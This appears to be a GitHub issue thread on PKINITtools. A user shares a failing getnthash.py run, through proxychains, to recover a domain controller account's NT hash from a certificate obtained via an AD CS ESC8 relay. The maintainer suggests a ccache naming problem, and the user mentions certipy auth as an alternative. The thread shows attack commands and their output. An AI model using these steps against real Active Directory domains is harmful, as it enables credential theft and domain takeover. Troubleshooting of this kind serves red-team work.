Short octet stream on tag decoding

[helloyw]

The pfx I obtained using adcs esc8

proxychains4 python3 getnthash.py -key 2797e04fc0a00ce9277ff8ebcf276fe0f660158bc970d560c988a2007180a216 redteam/DC$ -dc-ip 192.168.1.1 -debug
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20240130.154745.97007e84-py3.11.egg/impacket
[+] Using Kerberos Cache: dc.ccache
[+] SPN KRBTGT/redteam.com@redteam.com not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] No valid credentials found in cache. 
Traceback (most recent call last):
  File "/home/kali/Desktop/PKINITtools/getnthash.py", line 273, in <module>
    dumper.dump()
  File "/home/kali/Desktop/PKINITtools/getnthash.py", line 121, in dump
    decodedTGT = decoder.decode(tgt, asn1Spec = AS_REP())[0]
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/pyasn1/codec/ber/decoder.py", line 1337, in __call__
    raise error.SubstrateUnderrunError(
pyasn1.error.SubstrateUnderrunError: Short octet stream on tag decoding
[-] Short octet stream on tag decoding

[dirkjanm]

i think this error occurs because it cannot find the credentials in the ccache file, and then it runs into a parsing error later on. Make sure you have the naming correct for the principal you are trying to target (escaping or quoting special characters etc)

[helloyw]

i think this error occurs because it cannot find the credentials in the ccache file, and then it runs into a parsing error later on. Make sure you have the naming correct for the principal you are trying to target (escaping or quoting special characters etc)

There is no problem with the subject. You can use the certipy auth - f 1. pfx method to obtain the hash